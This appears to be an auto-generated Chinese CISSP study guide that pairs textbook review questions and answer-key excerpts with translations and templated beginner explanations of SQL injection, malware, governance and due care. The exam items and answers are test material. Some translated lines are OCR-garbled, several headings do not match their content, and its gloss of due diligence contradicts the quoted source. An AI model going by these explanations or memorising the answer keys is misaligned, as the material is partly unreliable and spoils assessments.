场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

注入攻击:注入攻击把恶意输入当命令或查询执行。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1457 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
注入攻击 注入攻击把恶意输入当命令或查询执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 64 / PDF P1458

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

B. & C. * D. ' 11. Katie is concerned about the potential for SQL injection attacks against her organization. She has already put a web application firewall in place and conducted a review of the organization's web application source code. She would like to add an additional control at the database level. What database technology could further limit the potential for SQL injection attacks? A. Triggers B. Parametrized queries C. Column encryption D. Concurrency control 12. What type of malicious software is specifically used to leverage stolen computing power for the attacker's financial gain? A. RAT B. PUP C. Cryptomalware D. Worm 13.

David is responsible for reviewing a series of web applications for vulnerabilities to cross-site scripting attacks. What characteristic should he watch out for that would indicate a high susceptibility to this type of attack? A. Reflected input B. Database-driven content C. .NET technology D. CGI scripts 14. Tom is investigating a security incident and found that the attacker was able to directly modify the contents of a system's memory. What type of application vulnerability would most directly facilitate this action? A. Rootkit B. & C. * D. ' 11.

中文直译 / 整理

凯蒂担心她的组织可能遭受SQL注入攻击。 她已经部署了Web应用防火 墙,并对组织的Web应用程序源代码进行了审查。 她希望在数据库层面增加 一项额外的控制措施。 哪种数据库技术可以进一步限制SQL注入攻击的可能 性? A. 触发器 B. 参数化查询 C. 列加密 D. 并发控制 12. 哪种恶意软件专门用于利用被盗的计算能力为攻击者谋取经济利益? A. RAT B. PUP C. Cryptomalware D. Worm 13. David 负责审查一系列 Web 应用程序 跨站脚本攻击的漏洞。 他应该注意什么特征,以判断系统是否极易受到此 类攻击? A. 反射输入 B. 数据库驱动的内容 C. .NET 技术 D. CGI 脚本 14. 汤姆正在调查一起安全事件,发现攻击者 able to directl y modif y s 的内容 y系统的内存 y。 什么 ype of 应用程序漏洞最直接地促成此操作? A. Rootkit

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
注入攻击 注入攻击把恶意输入当命令或查询执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 65 / PDF P1459

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

B. Back door C. TOC/TOU D. Buffer overflow 15. When designing firewall rules to prevent IP spoofing, which of the following principles should you follow? A. Packets with internal source IP addresses don't enter the network from the outside. B. Packets with internal source IP addresses don't exit the network from the inside. C. Packets with public IP addresses don't pass through the router in either direction. D. Packets with external source IP addresses don't enter the network from the outside. 16. Bob is developing a database-driven website, and he is worried that end users will insert content onto the site that, when viewed by a third party, causes them to perform an undesirable action.

What type of attack is Bob attempting to defend against? A. SQL injection B. Cross-site scripting C. Buffer overflow D. Evil twin 17. What techniques are commonly used to protect against SQL injection attacks? (Choose all that apply.) A. User acceptance testing B. Metacharacter escaping C. Stored procedures D. Input validation 18. Which one of the following attacks allows an attacker to execute targeted commands against the database supporting a web application? A. SQL injection B. Transaction manipulation B.

中文直译 / 整理

后门 C. TOC/TOU D. 缓冲区溢出 15. 在设计防火墙规则以防止IP欺骗时,应遵循以下哪项原则? A. 源IP地址为内部地址的数据包不应从外部进入网络。 B. 源IP地址为内部地址的数据包不应从内部流出网络。 C. 源IP地址为公网地址的数据包不应在任一方向上通过路由器。 D. 具有外部源IP地址的数据包不会从外部进入网络。 16. Bob正在开发一个基于数据库的网站,他担心最终用户会在网站上插入内容,当 第三方查看时, 会导致他们 p执行一项不良操作。 Bob 所进行的攻击属于哪种类型? 试图防御的是什么? A. SQL注入 B. 跨站脚本 C. 缓冲区溢出 D. 恶意双胞胎 17. 常用哪些技术来防范SQL注入攻击? (选择所有适用的选项。 ) A. 用户验收测试 B. 元字符转义 C. 存储过程 D. 输入验证 18. 以下哪种攻击允许攻击者对支持Web应用程序的数据库执行目标命令? A. SQL注入 B. 事务操纵

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 66 / PDF P1460

第 1460 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

C. Cross-site scripting D. Parameter manipulation 19. Syed visited the desktop of a user who was experiencing system issues. He saw an error message that said his files were encrypted with a unique key for his computer and that he should click a button for further instructions. What type of malware infection is Syed most likely dealing with? A. Ransomware B. Logic bomb C. Virus D. Worm 20. Rhonda is looking for a software solution that would help her monitor end user activity for signs of account compromise. Which one of the following tools would best assist with this task? A. UEBA B. IPS C. EDR D. CASB C.

中文直译 / 整理

跨站脚本攻击 D. 参数操纵 19. Syed 访问了一位遇到系统问题的用户的桌面。 他看到一条错误消息,称 他的文件已被针对其计算机的唯一密钥加密,并提示他点击一个按钮以获取 进一步的指示。 Syed 最可能遭遇的是哪种恶意软件感染? A. 勒索软件 B. 逻辑炸弹 C. 病毒 D. 蠕虫 20. 罗达正在寻找一种软件解决方案,以帮助她监控最终用户活动,以发现 账户被入侵的迹象。 以下哪种工具最能协助完成此任务? A. UEBA B. IPS C. EDR D. CASB

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1460 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 67 / PDF P1461

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

Appendix A Answers to Review Questions

中文直译 / 整理

附录 A 复习题答案

小白解释

场景先行:你是公司的安全负责人,正在读第 1461 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 68 / PDF P1462

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

Chapter 1: Security Governance Through Principles and Policies 1. C. Hardware destruction is a violation of availability and possibly integrity. Violations of confidentiality include stealing passwords, eavesdropping, and social engineering. 2. B. The primary goals and objectives of security are confidentiality, integrity, and availability, commonly referred to as the CIA Triad. The other options are incorrect. A security infrastructure needs to establish a network's border perimeter security, but that is not a primary goal or objective of security.

AAA services are a common component of secured systems, which can provide support for accounting, but the primary goals of security remain the elements of the CIA Triad. Ensuring that subject activities are recorded is the purpose of auditing, but that is not a primary goal or objective of security. 3. B. Availability means that authorized subjects are granted timely and uninterrupted access to objects. Identification is claiming an identity, the first step of AAA services. Encryption is protecting the confidentiality of data by converting plaintext into ciphertext. Layering is the use of multiple security mechanisms in series. 4. D.

Security governance seeks to compare the security processes and infrastructure used within the organization with knowledge and insight obtained from external sources. The other statements are not related to security governance. 5. C. A strategic plan is a long-term plan that is fairly stable. It defines the organization's security purpose. It defines the security function and aligns it with the goals, mission, and objectives of the organization. The tactical plan is a midterm plan developed to provide more details on accomplishing the goals set forth in the strategic plan or can be crafted ad hoc based on unpredicted events.

An operational plan is a short-term, highly detailed plan based on strategic and tactical plans. It is valid or useful only for a short time. A rollback plan is a means to return to a prior state after a change does not meet expectations. 6. A, C, D, F. Acquisitions and mergers place an organization at an increased level of risk. Such risks include inappropriate information disclosure, data loss, downtime, and failure to achieve a sufficient return on

中文直译 / 整理

第1章:通过原则与政策实现安全治理 1. C. 硬件销毁违反了可用性,也可能违反完整性。 违反机密性的行 为包括窃取密码、窃听和社会工程学。 2. B. 安全的主要目标和宗旨是机密性、完整性和可用性,通常称为CIA三元 组。 其他选项均不正确。 安全基础设施需要建立网络的边界防护,但这并非 安全的主要目标或宗旨。 AAA服务是安全系统中的常见组件,可提供计费支 持,但安全的主要目标仍然是CIA三元组的要素。 确保主体活动被记录是审 计的目的,但这并非安全的主要目标或宗旨。 3. B. 可用性指授权主体能够及时且不间断地访问对象。 标识是声明身份,是 AAA服务的第一步。 加密是通过将明文转换为密文来保护数据的机密性。 分 层是在一系列中使用多个安全机制。 4. D. 安全治理旨在将组织内部使用的安全流程和基础设施与来自外部的知识和见解进行 比较 获得的信息。 其他陈述与安全治理无关。 5. C. 战略计划是一种长期且相对稳定的计划,它定义了组织的安全目标, 明确了安全职能,并使其与组织的目标、使命和宗旨保持一致。 战术计划是 一种中期计划,用于提供更详细的实施策略以完成战略计划中设定的目标, 或可根据不可预见的事件临时制定。

运营计划是一种短期、高度详细的计划, 基于战略和战术计划制定,仅在短期内有效或有用。 回滚计划是一种在变更 未达到预期效果时返回到先前状态的手段。 6. A、C、D、F。 收购和合并使组织面临更高的风险。 此类风险包括不当的 信息泄露、数据丢失、服务中断以及未能实现足够的投资回报

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
学习单元 69 / PDF P1463

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

investment (ROI). Increased worker compliance is not a risk, but a desired security precaution against the risks of acquisitions. Additional insight into the motivations of inside attackers is not a risk, but a potential result of investigating breaches or incidents related to acquisitions. 7. C. Payment Card Industry Data Security Standard (PCI DSS) is a set of security standards and requirements designed to ensure the protection of sensitive credit card and debit card information. The other options are incorrect.

Information Technology Infrastructure Library (ITIL) was initially crafted by the British government for domestic use but is now an international standard, which is a set of recommended best practices for core IT security and operational processes, and is often used as a starting point for the crafting of a customized IT security solution. ISO 27000 is a family group of international security standards that can be the basis for implementing organizational security and related management practices. NIST Cybersecurity Framework (CSF) is designed for critical infrastructure and commercial organizations and consists of five functions: Identify, Protect, Detect, Respond, and Recover.

It is a prescription of operational activities that are to be performed on an ongoing basis for the support and improvement of security over time. 8. B. The security professional has the functional responsibility for security, including writing the security policy and implementing it. Senior management is ultimately responsible for the security maintained by an organization and should be most concerned about the protection of its assets. The custodian role is assigned to the person who is responsible for the tasks of implementing the prescribed protection defined by the security policy and senior management.

An auditor is responsible for reviewing and verifying that the security policy is properly implemented and that the derived security solutions are adequate. 9. A, B, C, E. The COBIT key principles are: Provide Stakeholder Value (C), Holistic Approach (A), Dynamic Governance System (E), Governance Distinct from Management (not listed), Tailored to Enterprise Needs (not listed), and End-to-End Governance System (B). The concept of maintaining authenticity and accountability are good security ideas, but not a COBIT key principle. 10. A, D. Due diligence is establishing a plan, policy, and process to protect the interests of an organization. Due care is practicing the individual

中文直译 / 整理

投资(ROI)。 员工合规性提升不是风险,而是针对并购风险所采取的 必要安全预防措施。 对内部攻击者动机的进一步了解不是风险,而是调 查与并购相关的违规或事件时可能获得的结果。 7. C. 支付卡行业数据安全标准(PCI DSS)是一套旨在确保敏感信用卡和借 记卡信息得到保护的安全标准和要求。 其他选项均不正确。 信息技术基础设 施库(ITIL)最初由英国政府为国内使用而制定,但现在已成为国际标准, 是一套针对核心IT安全和运营流程的推荐最佳实践,常被用作定制IT安全解 决方案的起点。 ISO 27000是一系列国际安全标准,可作为实施组织安全及 相关管理实践的基础。 NIST网络安全框架(CSF)专为关键基础设施和商业 组织设计,包含五个功能:识别、保护、检测、响应和恢复。 它是一套需要 持续执行的操作活动,以支持和提升长期的安全性。 8. B. 安全专业人员负有安全的职能责任,包括编写安全政策并实施该政策。 高级管理层对组织所维持的安全负有最终责任,应最关注其资产的保护。 保 管人角色指被指定负责执行安全政策和高级管理层所规定的保护措施的人员。

审计员负责审查和验证安全政策是否得到正确实施,以及由此产生的安全解 决方案是否充分。 9. A、B、C、E。 COBIT的关键原则包括:提供利益相关者价值(C)、整 体方法(A)、动态治理系统(E)、治理与管理相分离(未列出)、根据 企业需求定制(未列出)和端到端治理系统(B)。 维护真实性和问责性是 良好的安全理念,但不属于COBIT的关键原则。 10. A、D。 尽职调查是建立保护组织利益的计划、政策和流程。 尽责则是实践 个人

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

审计:审计记录主体行为,用于追责、复盘和取证。

问责性:问责性要求能把行为绑定到具体主体。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

证书、签名、强认证常支持真实性。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
COBIT COBIT 偏 IT 治理和控制目标。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
学习单元 70 / PDF P1464

应有谨慎与尽职调查

一个偏采取合理行动,一个偏持续验证监督。

教材原文段落

activities that maintain the security effort. The other options are incorrect; they have the terms inverted. The corrected statements are as follows: Due diligence is developing a formalized security structure containing a security policy, standards, baselines, guidelines, and procedures. Due care is the continued application of a security structure onto the IT infrastructure of an organization. Due diligence is knowing what should be done and planning for it. Due care is doing the right action at the right time. 11. B.

A policy is a document that defines the scope of security needed by the organization and discusses the assets that require protection and the extent to which security solutions should go to provide the necessary protection. A standard defines compulsory requirements for the homogenous use of hardware, software, technology, and security controls. A procedure is a detailed, step-by-step how-to document that describes the exact actions necessary to implement a specific security mechanism, control, or solution. A guideline offers recommendations on how security requirements are implemented and serves as an operational guide for both security professionals and users.

III is the definition of a baseline, which was not included as a component option. 12. D. When confidential documents are exposed to unauthorized entities, this is described by the I in STRIDE, which represents information disclosure. The elements of STRIDE are spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privilege. 13. B. This scenario describes a proactive approach to threat modeling, which is also known as the defensive approach. A reactive approach or adversarial approach to threat modeling takes place after a product has been created and deployed. There is no threat modeling concept known as the qualitative approach.

Qualitative is typically associated with a form of risk assessment. 14. A, B, D. These statements are true: (A) Each link in the supply chain should be responsible and accountable to the next link in the chain; (B) Commodity vendors are unlikely to have mined their own metals, processed the oil for plastics, or etched the silicon of their chips; and (D) Failing to properly secure a supply chain can result in flawed or less reliable products, or even embedded listing or remote control mechanisms. The remaining option is incorrect. Even if a final product

中文直译 / 整理

维持安全努力的活动。 其他选项均不正确,因为它们颠倒了术语。 更正后 的陈述如下:尽职调查是建立包含安全策略、标准、基线、指南和程序的 正式化安全结构。 尽责是持续将安全结构应用于组织的IT基础设施。 尽职 调查是了解应做什么并为之规划。 尽责是在正确的时间采取正确的行动。 11. B. 策略是一个文档,定义了组织所需的安全范围,讨论了需要保护的资产 以及安全解决方案应如何实施以提供必要的保护。 标准规定了硬件、软件、技 术和安全控制措施统一使用的强制性要求。 程序是一份详细的、分步骤的操作 文档,描述了实施特定安全机制、控制或解决方案所需的精确操作。 指南提供 了如何实施安全要求的建议,为安全专业人员和用户提供了操作指导。 III 是 基线的定义,但未作为组件选项包含在内。 12. D. 当机密文件被未经授权的实体接触时,这由 STRIDE 中的 I 表示, 即信息泄露。 STRIDE 的要素包括伪装、篡改、否认、信息泄露、拒绝服 务和权限提升。 13. B. 该情景描述了一种主动的威胁建模方法,也称为防御性方法。 被动方法 或对抗性方法在产品创建和部署后进行。 不存在称为定性方法的威胁建模概念;

定性通常与某种风险评估形式相关联。 14. A、B、D。 以下陈述为真:(A) 供应链中的每个环节都应对下一个环节负 责并承担责任; (B) 商品供应商不太可能自行开采金属、加工塑料用油或蚀刻 芯片中的硅; 以及 (D) 未能妥善保障供应链可能导致产品存在缺陷或可靠性 降低,甚至可能嵌入恶意列表或远程控制机制。 其余选项不正确。 即使最终 产品

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:一个偏采取合理行动,一个偏持续验证监督。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

授权:授权是认证之后决定你能访问什么、能做什么。

应有谨慎:应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“应有谨慎与尽职调查”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

认证成功不等于什么都能做;权限仍要单独授权。

Due care 偏“做正确的事”。

Due diligence 偏“确认事情被正确执行”。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
授权 授权是认证之后决定你能访问什么、能做什么。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
学习单元 71 / PDF P1465

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

seems reasonable and performs all necessary functions, that does not provide assurance that it is secure or that it was not tampered with somewhere in the supply chain. 15. D. Though not explicitly stating hardware, this scenario describes a typical and potential risk of a supply chain, that a hardware risk results in the presence of a listening mechanism in the final product. This scenario does not provide information that would indicate that the supply chain risk is focused on software, services, or data. 16. B. In this scenario, Cathy should void the authorization to operate (ATO) of this vendor.

This situation describes the fact that the vendor is not meeting minimal security requirements, which are necessary for the protection of the service and its customers. Writing a report is not a sufficient response to this discovery. You may have assumed Cathy does or does not have the authority to perform any of the other options, but there is no indication of Cathy's position in the organization. It is reasonable for a CEO to ask the CISO to perform such an evaluation. Regardless, the report should be submitted to the CISO, not the CIO, whose focus is primarily on ensuring that information is used effectively to accomplish business objectives, not that such use is secure.

Reviewing terms and conditions will not make any difference in this scenario, as those typically apply to customers, not internal operations. Reviewing does not necessarily cause a change or improvement to insecure practices. A vendor-signed NDA has no bearing on this scenario. 17. A. Minimum security requirements should be modeled on your existing security policy. This is based on the idea that when working with a third party, that third party should have at least the same security as your organization. A third-party audit is when a third-party auditor is brought in to perform an unbiased review of an entity's security infrastructure.

This audit may reveal where there are problems, but the audit should not be the basis of minimum security requirements for a third party. On-site assessment is when you visit the site of the organization to interview personnel and observe their operating habits. This is not the basis for establishing minimum security requirements for a third party. Vulnerability scan results, like third-party audits, may reveal concerns, but it is not the basis for establishing minimum security requirements for a third party.

中文直译 / 整理

